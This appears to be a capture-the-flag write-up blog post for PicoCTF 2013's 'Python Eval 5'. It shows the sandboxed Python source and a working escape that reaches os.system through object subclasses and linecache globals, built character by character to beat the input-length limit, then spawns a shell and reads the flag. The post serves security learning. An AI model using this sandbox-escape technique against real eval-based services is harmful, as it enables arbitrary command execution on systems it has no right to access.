hacktracking: # PicoCTF 2k13

# PicoCTF 2k13 - Python Eval 5

# cat task5.py 
#!/usr/bin/python -u
# task5.py
# A real challenge for those python masters out there :)

from sys import modules
modules.clear()
del modules

_raw_input = raw_input
_BaseException = BaseException
_EOFError = EOFError

__builtins__.__dict__.clear()
__builtins__ = None

print 'Get a shell, if you can...'

while 1:
  try:
    d = {'x':None}
    exec 'x='+_raw_input()[:50] in d
    print 'Return Value:', d['x']
  except _EOFError, e:
    raise e
  except _BaseException, e:
    print 'Exception:', e
# nc python.picoctf.com 6365
Get a shell, if you can...
().__class__.__base__.__subclasses__()[53]
Return Value: <class 'warnings.catch_warnings'>
__builtins__
Return Value: {}
# ipython
In [1]: for c in "().__class__.__base__.__subclasses__()[53].__init__.func_globals['linecache'].__dict__['os'].system('sh')":
   ...:     print "__builtins__['x'] = __builtins__['x'] + " + '"' + c + '"'
   ...:
# nc python.picoctf.com 6365
Get a shell, if you can...
__builtins__['x'] = ''
__builtins__['x'] = __builtins__['x'] + "("
__builtins__['x'] = __builtins__['x'] + ")"
__builtins__['x'] = __builtins__['x'] + "."
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "c"
__builtins__['x'] = __builtins__['x'] + "l"
__builtins__['x'] = __builtins__['x'] + "a"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "."
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "b"
__builtins__['x'] = __builtins__['x'] + "a"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "e"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "."
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "u"
__builtins__['x'] = __builtins__['x'] + "b"
__builtins__['x'] = __builtins__['x'] + "c"
__builtins__['x'] = __builtins__['x'] + "l"
__builtins__['x'] = __builtins__['x'] + "a"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "e"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "("
__builtins__['x'] = __builtins__['x'] + ")"
__builtins__['x'] = __builtins__['x'] + "["
__builtins__['x'] = __builtins__['x'] + "5"
__builtins__['x'] = __builtins__['x'] + "3"
__builtins__['x'] = __builtins__['x'] + "]"
__builtins__['x'] = __builtins__['x'] + "."
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "i"
__builtins__['x'] = __builtins__['x'] + "n"
__builtins__['x'] = __builtins__['x'] + "i"
__builtins__['x'] = __builtins__['x'] + "t"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "."
__builtins__['x'] = __builtins__['x'] + "f"
__builtins__['x'] = __builtins__['x'] + "u"
__builtins__['x'] = __builtins__['x'] + "n"
__builtins__['x'] = __builtins__['x'] + "c"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "g"
__builtins__['x'] = __builtins__['x'] + "l"
__builtins__['x'] = __builtins__['x'] + "o"
__builtins__['x'] = __builtins__['x'] + "b"
__builtins__['x'] = __builtins__['x'] + "a"
__builtins__['x'] = __builtins__['x'] + "l"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "["
__builtins__['x'] = __builtins__['x'] + "'"
__builtins__['x'] = __builtins__['x'] + "l"
__builtins__['x'] = __builtins__['x'] + "i"
__builtins__['x'] = __builtins__['x'] + "n"
__builtins__['x'] = __builtins__['x'] + "e"
__builtins__['x'] = __builtins__['x'] + "c"
__builtins__['x'] = __builtins__['x'] + "a"
__builtins__['x'] = __builtins__['x'] + "c"
__builtins__['x'] = __builtins__['x'] + "h"
__builtins__['x'] = __builtins__['x'] + "e"
__builtins__['x'] = __builtins__['x'] + "'"
__builtins__['x'] = __builtins__['x'] + "]"
__builtins__['x'] = __builtins__['x'] + "."
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "d"
__builtins__['x'] = __builtins__['x'] + "i"
__builtins__['x'] = __builtins__['x'] + "c"
__builtins__['x'] = __builtins__['x'] + "t"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "_"
__builtins__['x'] = __builtins__['x'] + "["
__builtins__['x'] = __builtins__['x'] + "'"
__builtins__['x'] = __builtins__['x'] + "o"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "'"
__builtins__['x'] = __builtins__['x'] + "]"
__builtins__['x'] = __builtins__['x'] + "."
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "y"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "t"
__builtins__['x'] = __builtins__['x'] + "e"
__builtins__['x'] = __builtins__['x'] + "m"
__builtins__['x'] = __builtins__['x'] + "("
__builtins__['x'] = __builtins__['x'] + "'"
__builtins__['x'] = __builtins__['x'] + "s"
__builtins__['x'] = __builtins__['x'] + "h"
__builtins__['x'] = __builtins__['x'] + "'"
__builtins__['x'] = __builtins__['x'] + ")"
None; exec __builtins__['x']
ls -lh
total 12K
-rw-r----- 1 root py5  26 Apr 26  2013 flag_for_masters
-rwxr-x--- 1 root py5  59 Apr 27  2013 run.sh
-rwxr-x--- 1 root py5 501 Apr 26  2013 task5.py
cat flag_for_masters
you_are_the_pyeval_master
# PicoCTF 2k13 - Python Eval 5

No comments:
